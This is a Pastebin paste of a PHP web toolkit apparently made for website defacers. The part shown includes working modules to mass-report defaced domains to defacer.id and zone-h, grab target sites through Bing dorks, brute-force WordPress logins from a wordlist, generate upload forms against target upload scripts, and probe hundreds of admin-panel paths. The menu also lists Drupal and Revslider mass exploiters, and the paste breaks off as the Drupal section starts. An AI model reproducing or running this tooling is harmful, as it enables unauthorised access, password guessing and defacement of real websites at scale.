API tools faq
paste
Advertisement
Jemb0t_IR3eng

tools

Jemb0t_IR3eng
Jan 14th, 2017
454
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 29.93 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2. <head>
  3. <title>Toolers</title>
  4. <meta name='author' content='Shun403'>
  5. <meta charset="UTF-8">
  6. <style type='text/css'>
  7. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  8. html {
  9. background: black;
  10. background-image:url(http://animeku.tv/wp-content/uploads/2017/01/Background-Animeku-cewe1.png);background-position:top center;background-size:cover;background-attachment:fixed;background-repeat:no-repeat;color:#a2a2a2;min-width:900px;font:12px titillium,arial;font-stretch:condensed;font-size:12px;margin:0;
  11. color: #ffffff;
  12. font-family: 'Share Tech Mono';
  13. font-size: 12px;
  14. width: 100%;
  15. }
  16. li {
  17. display: inline;
  18. margin: 1px;
  19. padding: 1px;
  20. }
  21.  
  22. #menu a {
  23. padding:2px 10px;
  24. margin:0;
  25. background:#222222;
  26. text-decoration:none;
  27. letter-spacing:2px;
  28. padding: 2px 10px;
  29. margin: 0;
  30. background: #222222;
  31. text-decoration: none;
  32. letter-spacing: 2px;
  33. border-radius: 2px;
  34. border-bottom: 2px solid #B5AFAF;
  35. border-top: 2px solid #B5AFAF;
  36. border-right: 2px solid darkblue;
  37. border-left: 2px solid darkblue;
  38. }
  39. #menu a:hover {
  40. background:#180000;
  41. border-bottom:0px solid #333333;
  42. border-top:0px solid #333333;
  43. }
  44. table tr:first-child{
  45. background: red;
  46. text-align: center;
  47. color: white;
  48. }
  49. table, th, td {
  50. border-collapse:collapse;
  51. font-family: Tahoma, Geneva, sans-serif;
  52. background: transparent;
  53. font-family: 'Share Tech Mono';
  54. font-size: 13px;
  55. }
  56. .table_home, .th_home, .td_home {
  57. border: 1px solid blue;
  58. }
  59. th {
  60. padding: 10px;
  61. }
  62. a {
  63. color: #ffffff;
  64. text-decoration: none;
  65. }
  66. a:hover {
  67. color: blue;
  68. text-decoration: underline;
  69. }
  70. b {
  71. color: blue;
  72. }
  73. input[type=text], input[type=password],input[type=submit] {
  74. background: transparent;
  75. color: #ffffff;
  76. border: 1px solid #ffffff;
  77. margin: 5px auto;
  78. padding-left: 5px;
  79. font-family: 'Share Tech Mono';
  80. font-size: 13px;
  81. }
  82. input[type=submit] {
  83. background: transparent;
  84. color: #ffffff;
  85. border: 1px solid #ffffff;
  86. margin: 5px auto;
  87. padding-left: 5px;
  88. font-family: 'Share Tech Mono';
  89. font-size: 13px;
  90. cursor:pointer;
  91. }
  92. textarea {
  93. border: 1px solid #ffffff;
  94. width: 50%;
  95. height: 200px;
  96. padding-left: 5px;
  97. margin: 10px auto;
  98. resize: none;
  99. background: transparent;
  100. color: #ffffff;
  101. font-family: 'Share Tech Mono';
  102. font-size: 13px;
  103. }
  104. select {
  105. width: 152px;
  106. background: #000000;
  107. color: blue;
  108. border: 1px solid #ffffff;
  109. margin: 5px auto;
  110. padding-left: 5px;
  111. font-family: 'Share Tech Mono';
  112. font-size: 13px;
  113. }
  114. option:hover {
  115. background: blue;
  116. color: #000000;
  117. }
  118. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  119. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  120. .infoweb {
  121. border-right: 1px solid #00FFFF;
  122. }
  123. </style>
  124. <script type="text/javascript" src="http://scmplayer.net/script.js"
  125.  
  126. data-config="{'skin':'http://static.tumblr.com/uf7d8p8/5ylmihcdv/skinlindaawn.css','volume':100,'autoplay':true,'shuffle':false,'repeat':1,'placement':'bottom','showplaylist':false,'playlist':[{'title':'Porter Robinson & Madeon - Shelter','url':'https://www.youtube.com/watch?v=emsSkZu2eNU'},{'title':'OneOkRock-Answer Is Near','url':'https://www.youtube.com/watch?v=UlmhKXA77ro'},{'title':'NightCore - Hotaru','url':'https://www.youtube.com/watch?v=hUxvXv8Bp50'},{'title':'NightCore - Hey Soul Sister','url':'https://www.youtube.com/watch?v=jU2w4kZ6Rb0'},{'title':'NightCore - Apologize','url':'https://www.youtube.com/watch?v=Id9I1YHPWI4'},{'title':'NightCore - Fireflies','url':'https://www.youtube.com/watch?v=pIi_lbsR2ck'},{'title':'NightCore - Dare Yori Mo','url':'https://www.youtube.com/watch?v=P-ANXx_M7gc'},{'title':'Yiruma&Skullee-RiverFlowsInYou','url':'https://www.youtube.com/watch?v=GmBq7xN1Gqk'},{'title':'Teminite & Panda Eyes - Highscore','url':'https://www.youtube.com/watch?v=pEuVb3LhBYM'},{'title':'Parasyte ending - It%27s The Right Time','url':'https://www.youtube.com/watch?v=pcWSiNbP4k8'},{'title':'Tokyo Ghoul - Unravel Lyrics (Official Acoustic)','url':'https://www.youtube.com/watch?v=MMDU4hhRjQM'},{'title':'/PARASYTEost/ ~ Next to You ~ DRUMSTEP REMIX ~','url':'https://www.youtube.com/watch?v=xZYxNl6jP0Y'},{'title':'TheFatRat-NeverBeAlone','url':'https://www.youtube.com/watch?v=iyWjKQo9-m8'},{'title':'TheFatRat-Unity','url':'https://www.youtube.com/watch?v=CzCjMbYZWN8'},]}" ></script>
  127.  
  128. <!-- SCM Music Player script end -->
  129. <?php
  130. echo "<div id='menu'>";
  131. echo "<hr color='red'>";
  132. echo "<hr color='blue'>";
  133. echo "<center>";
  134. echo "<ul>";
  135. echo "<li> <a href='?'>Home</a> </li>";
  136. echo "<li> <a href='?defacerid'>Defacer.id Mass Notify</a> </li>";
  137. echo "<li> <a href='?zoneh'>Zone-h Mass Notify</a> </li>";
  138. echo "<li> <a href='?bing'>Bing Grabber</a> </li>";
  139. echo "<li> <a href='?csrf'>Csrf Exploiter</a> </li>";
  140. echo "<li> <a href='?adfin'>Admin Finder</a> </li>";
  141. echo "<li> <a href='?drupal'>Drupal Mass Exploiter</a> </li>";
  142. echo "<li> <a href='?wpbf'>WordPress BruteForce</a> </li><br><br>";
  143. echo "<li> <a href='?revslider'>Revslider Mass Exploiter</a> </li>";
  144. echo "</ul>";
  145. echo "</center>";
  146. echo "<hr color='blue'>";
  147. echo "<hr color='red'>";
  148. echo "</div>";
  149.  
  150. if(isset($_REQUEST['defacerid'])){
  151. echo "<center><form method='post'>
  152. <u>Defacer</u>: <br>
  153. <input type='text' name='hekel' size='50' value='NickMu'><br>
  154. <u>Team</u>: <br>
  155. <input type='text' name='tim' size='50' value='TeamMu'><br>
  156. <u>Domains</u>: <br>
  157. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  158. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  159. </form>";
  160. $site = explode("\r\n", $_POST['sites']);
  161. $go = $_POST['go'];
  162. $hekel = $_POST['hekel'];
  163. $tim = $_POST['tim'];
  164. if($go) {
  165. foreach($site as $sites) {
  166. $zh = $sites;
  167. $form_url = "https://www.defacer.id/notify";
  168. $data_to_post = array();
  169. $data_to_post['attacker'] = "$hekel";
  170. $data_to_post['team'] = "$tim";
  171. $data_to_post['poc'] = 'SQL Injection';
  172. $data_to_post['url'] = "$zh";
  173. $curl = curl_init();
  174. curl_setopt($curl,CURLOPT_URL, $form_url);
  175. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  176. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  177. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  178. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  179. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  180. $result = curl_exec($curl);
  181. echo $result;
  182. curl_close($curl);
  183. echo "<br>";
  184. }
  185. }
  186. }
  187. if(isset($_REQUEST['zoneh'])){
  188. if($_POST['submit']) {
  189. $domain = explode("\r\n", $_POST['url']);
  190. $nick = $_POST['nick'];
  191. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  192. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  193. function zoneh($url,$nick) {
  194. $ch = curl_init("http://www.zone-h.com/notify/single");
  195. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  196. curl_setopt($ch, CURLOPT_POST, true);
  197. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  198. return curl_exec($ch);
  199. curl_close($ch);
  200. }
  201. foreach($domain as $url) {
  202. $zoneh = zoneh($url,$nick);
  203. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  204. echo "$url -> <font color=blue>OK</font><br>";
  205. } else {
  206. echo "$url -> <font color=red>ERROR</font><br>";
  207. }
  208. }
  209. }
  210. else {
  211. echo "<center><form method='post'>
  212. <u>Defacer</u>: <br>
  213. <input type='text' name='nick' size='50' value='NickMu'><br>
  214. <u>Domains</u>: <br>
  215. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  216. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  217. </form>";
  218. }
  219. echo "</center>";
  220.  
  221. }
  222. if(isset($_REQUEST['bing'])){
  223. @ini_set('output_buffering',0);
  224. ?>
  225. <head>
  226. <style type="text/css">
  227. textarea {
  228. width: 500px;
  229. height: 250px;
  230. border: 1px solid #000000;
  231. margin: 5px auto;
  232. padding: 7px;
  233. }
  234. input[type=text] {
  235. padding-left: 7px;
  236. width: 250px;
  237. height: 25px;
  238. border: 1px solid #000000;
  239. background: blue;
  240. margin: 5px auto;
  241. }
  242. input[type=submit] {
  243. height: 25px;
  244. border: 1px solid #000000;
  245. background: red;
  246. margin: 5px auto;
  247. color: #000000;
  248. }
  249. </style>
  250. </head>
  251. <center><form method="post">
  252. <font color=red>Bing Dork: <input type="text" name="dork" placeholder="dork" required>
  253. <input type="submit" name="go" value=">>">
  254. </form>
  255. <?php
  256. // coded by Mr. Magnom
  257. // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
  258. // greetz to Mr. Magnom - Sanjungan Jiwa
  259. function getsource($url, $proxy) {
  260. $curl = curl_init($url);
  261. curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  262. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  263. if($proxy) {
  264. $proxy = explode(':', autoprox());
  265. curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
  266. curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
  267. }
  268. $content = curl_exec($curl);
  269. curl_close($curl);
  270. return $content;
  271. }
  272. $dork = htmlspecialchars($_POST['dork']);
  273. $do = urlencode($dork);
  274. if(isset($_POST['go'])) {
  275. $npage = 1;
  276. $npages = 30000;
  277. $allLinks = array();
  278. $lll = array();
  279. while($npage <= $npages) {
  280. $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
  281. if($x) {
  282. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  283. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  284. $npage = $npage + 10;
  285. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  286. } else break;
  287. }
  288. $URLs = array();
  289. foreach($allLinks as $url){
  290. $exp = explode("/", $url);
  291. $URLs[] = $exp[2];
  292. }
  293. $array = array_filter($URLs);
  294. $array = array_unique($array);
  295. $sss = count(array_unique($array));
  296. echo "ToTaL SiTe : $sss<br>";
  297. foreach($array as $domain) {
  298. echo "http://$domain/<br>";
  299. }
  300. }
  301. }
  302. if(isset($_REQUEST['wpbf'])){
  303. set_time_limit(0);
  304. error_reporting(0);
  305.  
  306. class rintoar{
  307.  
  308. private $host;
  309. private $user;
  310. private $open;
  311. private $lista;
  312.  
  313. public function banner() {
  314. echo(" <html>
  315. <head>
  316. <title>Wp-Brute Force</title>
  317. <style type='text/css'>
  318.  
  319. .ext{
  320. color: blue;
  321. }
  322.  
  323. .area{
  324. width:400px;
  325. height:350px;
  326. resize:none;
  327. }
  328.  
  329. </style>
  330. </head>
  331. <body>
  332. <h1><center>WordPress Brute Force</center></h1>
  333. <form action='' method='POST'>
  334. <center>Host:<input type='text' name='host' placeholder='http://tager.com/' size='40' > </center><br>
  335. <center>User:<input type='text' name='user' value='admin' size='25'> </center><br>
  336. <center>Wordlist</center>
  337. <center><textarea class='area' name='lista'></textarea><br><br><center>
  338. <center><input type='Submit' value='Start'></center>
  339. </form>
  340. </body>
  341. </html>");
  342.  
  343. }
  344.  
  345. public function extract_post() {
  346. $this->host = $_POST["host"];
  347. $this->user = $_POST["user"];
  348. $this->open = $_POST["lista"];
  349. }
  350.  
  351. public function Xregex() {
  352. if(preg_match("@/wp-login.php@", $this->host)) {
  353. return true;
  354. } else {
  355. $this->host = $_POST["host"]."/wp-login.php";
  356. }
  357. }
  358.  
  359. public function brute() {
  360. $lista = array_filter(explode("\n", $this->open));
  361. foreach($lista as $this->lista) {
  362. for($i=0; $i < count($this->lista); $i++) {
  363. $this->Xcurl();
  364. }
  365. }
  366. }
  367.  
  368. private function cool() {
  369. echo "[+] Host:"."<font color='white'>{$this->host}</font>";
  370. echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
  371. echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
  372. }
  373.  
  374. private function Xcurl() {
  375. $curl = curl_init();
  376. curl_setopt($curl, CURLOPT_URL, $this->host);
  377. curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
  378. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  379. curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
  380. curl_setopt($curl, CURLOPT_POST, true);
  381. curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
  382. $exec = curl_exec($curl);
  383. $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  384. $this->cool();
  385. if($http == 302) {
  386. echo "<font color='#00FF00'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
  387. break;
  388. } else {
  389. echo "<font color='red'><br/>[+] Failed</font><br>";
  390. }
  391. curl_close($curl);
  392. }
  393. }
  394.  
  395. $wp = new rintoar();
  396. $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
  397. $wp->banner();
  398. $wp->extract_post();
  399. $wp->Xregex();
  400. $wp->brute();
  401. }
  402. if(isset($_REQUEST['csrf'])){
  403. echo '<html>
  404. <center><h1 style="font-size:33px;">CSRF Exploiter </h1><br><br>
  405. <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
  406. <br><br>
  407. <form method="post" style="font-size:25px;">
  408. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  409. POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
  410. <input type="submit" name="d" value="Lock!">
  411. </form>';
  412. $url = $_POST["url"];
  413. $pf = $_POST["pf"];
  414. $d = $_POST["d"];
  415. if($d) {
  416. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
  417. </html>";
  418. }
  419.  
  420. }
  421. if(isset($_REQUEST['adfin'])){
  422. ?>
  423. <form action="?adfin" method="post">
  424.  
  425. <?php
  426. set_time_limit(0);
  427. error_reporting(0);
  428. $list['front'] ="admin
  429. adm
  430. admincp
  431. admcp
  432. cp
  433. modcp
  434. moderatorcp
  435. adminare
  436. admins
  437. cpanel
  438. controlpanel";
  439. $list['end'] = "admin1.php
  440. adm/
  441. _adm_
  442. _admin_
  443. _administrator_
  444. operator
  445. sika
  446. adminweb
  447. develop
  448. ketua
  449. redaktur
  450. author
  451. user
  452. users
  453. dinkesadmin
  454. retel
  455. panel
  456. paneladmin
  457. panellogin
  458. redaksi
  459. cp-admin
  460. Login@web
  461. admin1
  462. admin2
  463. admin3
  464. admin4
  465. admin5
  466. admin6
  467. admin7
  468. admin8
  469. admin9
  470. admin10
  471. master
  472. master/index.php
  473. master/login.php
  474. terasadmin/index.php
  475. terasadmin/login.php
  476. rahasia
  477. rahasia/login.php
  478. rahasia/admin.php
  479. rahasia/index.php
  480. dinkesadmin/login.php
  481. adminpmb
  482. adminpmb/index.php
  483. adminpmb/login.php
  484. system
  485. system/index.php
  486. system/login.php
  487. system/admin.php
  488. webadmin
  489. webadmin/index.php
  490. webadmin/login.php
  491. wpanel
  492. wpanel/index.php
  493. wpanel/login.php
  494. adminpanel
  495. adminpanel/index.php
  496. adminpanel/login.php
  497. adminkec
  498. adminkec/index.php
  499. adminkec/login.php
  500. admindesa
  501. admindesa/index.php
  502. admindesa/login.php
  503. adminkota
  504. adminkota/index.php
  505. adminkota/login.php
  506. admin123
  507. admin123/index.php
  508. admin123/login.php
  509. logout
  510. logout/index.php
  511. logout/login.php
  512. logout/admin.php
  513. adminweb_setting
  514. admin1.html
  515. admin
  516. administrator
  517. admin1.html
  518. admin2.php
  519. admin2.html
  520. yonetim.php
  521. yonetim.html
  522. yonetici.php
  523. yonetici.html
  524. ccms/
  525. ccms/login.php
  526. ccms/index.php
  527. maintenance/
  528. webmaster/
  529. adm/
  530. configuration/
  531. configure/
  532. websvn/
  533. admin/
  534. admin/account.php
  535. admin/account.html
  536. admin/index.php
  537. admin/index.html
  538. admin/login.php
  539. admin/login.html
  540. admin/home.php
  541. admin/controlpanel.html
  542. admin/controlpanel.php
  543. admin.php
  544. admin.html
  545. admin/cp.php
  546. admin/cp.html
  547. cp.php
  548. cp.html
  549. administrator/
  550. administrator/index.html
  551. administrator/index.php
  552. administrator/login.html
  553. administrator/login.php
  554. administrator/account.html
  555. administrator/account.php
  556. administrator.php
  557. administrator.html
  558. login.php
  559. login.html
  560. modelsearch/login.php
  561. moderator.php
  562. moderator.html
  563. moderator/login.php
  564. moderator/login.html
  565. moderator/admin.php
  566. moderator/admin.html
  567. moderator/
  568. account.php
  569. account.html
  570. controlpanel/
  571. controlpanel.php
  572. controlpanel.html
  573. admincontrol.php
  574. admincontrol.html
  575. adminpanel.php
  576. adminpanel.html
  577. admin1.asp
  578. admin2.asp
  579. yonetim.asp
  580. yonetici.asp
  581. admin/account.asp
  582. admin/index.asp
  583. admin/login.asp
  584. admin/home.asp
  585. admin/controlpanel.asp
  586. admin.asp
  587. admin/cp.asp
  588. cp.asp
  589. administrator/index.asp
  590. administrator/login.asp
  591. administrator/account.asp
  592. administrator.asp
  593. login.asp
  594. modelsearch/login.asp
  595. moderator.asp
  596. moderator/login.asp
  597. moderator/admin.asp
  598. account.asp
  599. controlpanel.asp
  600. admincontrol.asp
  601. adminpanel.asp
  602. fileadmin/
  603. fileadmin.php
  604. fileadmin.asp
  605. fileadmin.html
  606. administration/
  607. administration.php
  608. administration.html
  609. sysadmin.php
  610. sysadmin.html
  611. phpmyadmin/
  612. myadmin/
  613. sysadmin.asp
  614. sysadmin/
  615. ur-admin.asp
  616. ur-admin.php
  617. ur-admin.html
  618. ur-admin/
  619. Server.php
  620. Server.html
  621. Server.asp
  622. Server/
  623. wp-admin/
  624. administr8.php
  625. administr8.html
  626. administr8/
  627. administr8.asp
  628. webadmin/
  629. webadmin.php
  630. webadmin.asp
  631. webadmin.html
  632. administratie/
  633. admins/
  634. admins.php
  635. admins.asp
  636. admins.html
  637. administrivia/
  638. Database_Administration/
  639. WebAdmin/
  640. useradmin/
  641. sysadmins/
  642. admin1/
  643. system-administration/
  644. administrators/
  645. pgadmin/
  646. directadmin/
  647. staradmin/
  648. ServerAdministrator/
  649. SysAdmin/
  650. administer/
  651. LiveUser_Admin/
  652. sys-admin/
  653. typo3/
  654. panel/
  655. cpanel/
  656. cPanel/
  657. cpanel_file/
  658. platz_login/
  659. rcLogin/
  660. blogindex/
  661. formslogin/
  662. autologin/
  663. support_login/
  664. meta_login/
  665. manuallogin/
  666. simpleLogin/
  667. loginflat/
  668. utility_login/
  669. showlogin/
  670. memlogin/
  671. members/
  672. login-redirect/
  673. sub-login/
  674. wp-login.php
  675. login1/
  676. dir-login/
  677. login_db/
  678. xlogin/
  679. smblogin/
  680. customer_login/
  681. UserLogin/
  682. login-us/
  683. acct_login/
  684. admin_area/
  685. bigadmin/
  686. project-admins/
  687. phppgadmin/
  688. pureadmin/
  689. sql-admin/
  690. radmind/
  691. openvpnadmin/
  692. wizmysqladmin/
  693. vadmind/
  694. ezsqliteadmin/
  695. hpwebjetadmin/
  696. newsadmin/
  697. adminpro/
  698. Lotus_Domino_Admin/
  699. bbadmin/
  700. vmailadmin/
  701. Indy_admin/
  702. ccp14admin/
  703. irc-macadmin/
  704. banneradmin/
  705. sshadmin/
  706. phpldapadmin/
  707. macadmin/
  708. administratoraccounts/
  709. admin4_account/
  710. admin4_colon/
  711. radmind-1/
  712. Super-Admin/
  713. AdminTools/
  714. cmsadmin/
  715. SysAdmin2/
  716. globes_admin/
  717. cadmins/
  718. phpSQLiteAdmin/
  719. navSiteAdmin/
  720. server_admin_small/
  721. logo_sysadmin/
  722. server/
  723. database_administration/
  724. power_user/
  725. system_administration/
  726. ss_vms_admin_sm/
  727. adminarea/
  728. bb-admin/
  729. adminLogin/
  730. panel-administracion/
  731. instadmin/
  732. memberadmin/
  733. administratorlogin/
  734. admin/admin.php
  735. admin_area/admin.php
  736. admin_area/login.php
  737. siteadmin/login.php
  738. siteadmin/index.php
  739. siteadmin/login.html
  740. admin/admin.html
  741. admin_area/index.php
  742. bb-admin/index.php
  743. bb-admin/login.php
  744. bb-admin/admin.php
  745. admin_area/login.html
  746. admin_area/index.html
  747. admincp/index.asp
  748. admincp/login.asp
  749. admincp/index.html
  750. webadmin/index.html
  751. webadmin/admin.html
  752. webadmin/login.html
  753. admin/admin_login.html
  754. admin_login.html
  755. panel-administracion/login.html
  756. nsw/admin/login.php
  757. webadmin/login.php
  758. admin/admin_login.php
  759. admin_login.php
  760. admin_area/admin.html
  761. pages/admin/admin-login.php
  762. admin/admin-login.php
  763. admin-login.php
  764. bb-admin/index.html
  765. bb-admin/login.html
  766. bb-admin/admin.html
  767. admin/home.html
  768. pages/admin/admin-login.html
  769. admin/admin-login.html
  770. admin-login.html
  771. admin/adminLogin.html
  772. adminLogin.html
  773. home.html
  774. rcjakar/admin/login.php
  775. adminarea/index.html
  776. adminarea/admin.html
  777. webadmin/index.php
  778. webadmin/admin.php
  779. user.html
  780. modelsearch/login.html
  781. adminarea/login.html
  782. panel-administracion/index.html
  783. panel-administracion/admin.html
  784. modelsearch/index.html
  785. modelsearch/admin.html
  786. admincontrol/login.html
  787. adm/index.html
  788. adm.html
  789. user.php
  790. panel-administracion/login.php
  791. wp-login.php
  792. adminLogin.php
  793. admin/adminLogin.php
  794. home.php
  795. adminarea/index.php
  796. adminarea/admin.php
  797. adminarea/login.php
  798. panel-administracion/index.php
  799. panel-administracion/admin.php
  800. modelsearch/index.php
  801. modelsearch/admin.php
  802. admincontrol/login.php
  803. adm/admloginuser.php
  804. admloginuser.php
  805. admin2/login.php
  806. admin2/index.php
  807. adm/index.php
  808. adm.php
  809. affiliate.php
  810. adm_auth.php
  811. memberadmin.php
  812. administratorlogin.php
  813. admin/admin.asp
  814. admin_area/admin.asp
  815. admin_area/login.asp
  816. admin_area/index.asp
  817. bb-admin/index.asp
  818. bb-admin/login.asp
  819. bb-admin/admin.asp
  820. pages/admin/admin-login.asp
  821. admin/admin-login.asp
  822. admin-login.asp
  823. user.asp
  824. webadmin/index.asp
  825. webadmin/admin.asp
  826. webadmin/login.asp
  827. admin/admin_login.asp
  828. admin_login.asp
  829. panel-administracion/login.asp
  830. adminLogin.asp
  831. admin/adminLogin.asp
  832. home.asp
  833. adminarea/index.asp
  834. adminarea/admin.asp
  835. adminarea/login.asp
  836. panel-administracion/index.asp
  837. panel-administracion/admin.asp
  838. modelsearch/index.asp
  839. modelsearch/admin.asp
  840. admincontrol/login.asp
  841. adm/admloginuser.asp
  842. admloginuser.asp
  843. admin2/login.asp
  844. admin2/index.asp
  845. adm/index.asp
  846. adm.asp
  847. affiliate.asp
  848. adm_auth.asp
  849. memberadmin.asp
  850. administratorlogin.asp
  851. siteadmin/login.asp
  852. siteadmin/index.asp
  853. ADMIN/
  854. paneldecontrol/
  855. login/
  856. cms/
  857. admon/
  858. ADMON/
  859. administrador/
  860. ADMIN/login.php
  861. panelc/
  862. ADMIN/login.html";
  863. function template() {
  864. echo '
  865.  
  866. <script type="text/javascript">
  867. <!--
  868. function insertcode($text, $place, $replace)
  869. {
  870. var $this = $text;
  871. var logbox = document.getElementById($place);
  872. if($replace == 0)
  873. document.getElementById($place).innerHTML = logbox.innerHTML+$this;
  874. else
  875. document.getElementById($place).innerHTML = $this;
  876. //document.getElementById("helpbox").innerHTML = $this;
  877. }
  878. -->
  879. </script>
  880. <br>
  881. <br>
  882. <h1 class="technique-two">
  883.  
  884.  
  885.  
  886. </h1>
  887.  
  888. <div class="wrapper">
  889. <div class="red">
  890. <div class="tube">
  891. <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
  892. <form action="" method="post" name="xploit_form">
  893.  
  894. <tr>
  895. <tr>
  896. <b><td>URL</td>
  897. <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
  898. </td>
  899. </tr><tr>
  900. <td>404 string</td>
  901. <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
  902. </td></b>
  903. </tr><br><td>
  904. <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
  905. </span></td></tr>
  906. </form></td></tr>
  907. <br /></table>
  908. </div> <!-- /tube -->
  909. </div> <!-- /red -->
  910. <br />
  911. <div class="green">
  912. <div class="tube" id="rightcol">
  913. Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
  914. <b>Found ones:<br /></b>
  915. </div> <!-- /tube -->
  916. </div></center><!-- /green -->
  917. <br clear="all" /><br />
  918. <div class="blue">
  919. <div class="tube" id="logbox">
  920. <br />
  921. <br />
  922. Admin page Finder :<br /><br />
  923. </div> <!-- /tube -->
  924. </div> <!-- /blue -->
  925. </div> <!-- /wrapper -->
  926. <br clear="all"><br>';
  927. }
  928. function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
  929. if($br == 1) $msg .= "<br />";
  930. echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
  931. if($stop == 1) exit;
  932. @flush();@ob_flush();
  933. }
  934. function check($x, $front=0) {
  935. global $_POST,$site,$false;
  936. if($front == 0) $t = $site.$x;
  937. else $t = 'http://'.$x.'.'.$site.'/';
  938. $headers = get_headers($t);
  939. if (!eregi('200', $headers[0])) return 0;
  940. $data = @file_get_contents($t);
  941. if($_POST['xploit_404string'] == "") if($data == $false) return 0;
  942. if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
  943. return 1;
  944. }
  945.  
  946. // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  947. template();
  948. if(!isset($_POST['xploit_url'])) die;
  949. if($_POST['xploit_url'] == '') die;
  950. $site = $_POST['xploit_url'];
  951. if ($site[strlen($site)-1] != "/") $site .= "/";
  952. if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
  953. $list['end'] = str_replace("\r", "", $list['end']);
  954. $list['front'] = str_replace("\r", "", $list['front']);
  955. $pathes = explode("\n", $list['end']);
  956. $frontpathes = explode("\n", $list['front']);
  957. show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
  958. $verificate = 0;
  959. foreach($pathes as $path) {
  960. show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
  961. $verificate++; show($verificate, 0, 0, 'verified', 1);
  962. if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
  963. else{
  964. show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  965. show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
  966. }
  967. }
  968. preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
  969. if(substr($site, 0, 3) == "www") $site = substr($site, 4);
  970. foreach($frontpathes as $frontpath) {
  971. show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
  972. $verificate++; show($verificate, 0, 0, 'verified', 1);
  973. if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
  974. else{
  975. show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
  976. show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
  977. }
  978.  
  979. }
  980. }
  981. if(isset($_REQUEST['drupal']))
  982. {
  983. echo "<body>
  984. <center>
  985. <h1 style='color:green;text-shadow:0.5px 0px 0px white;'>Drupal Mass Exploiter</h1>
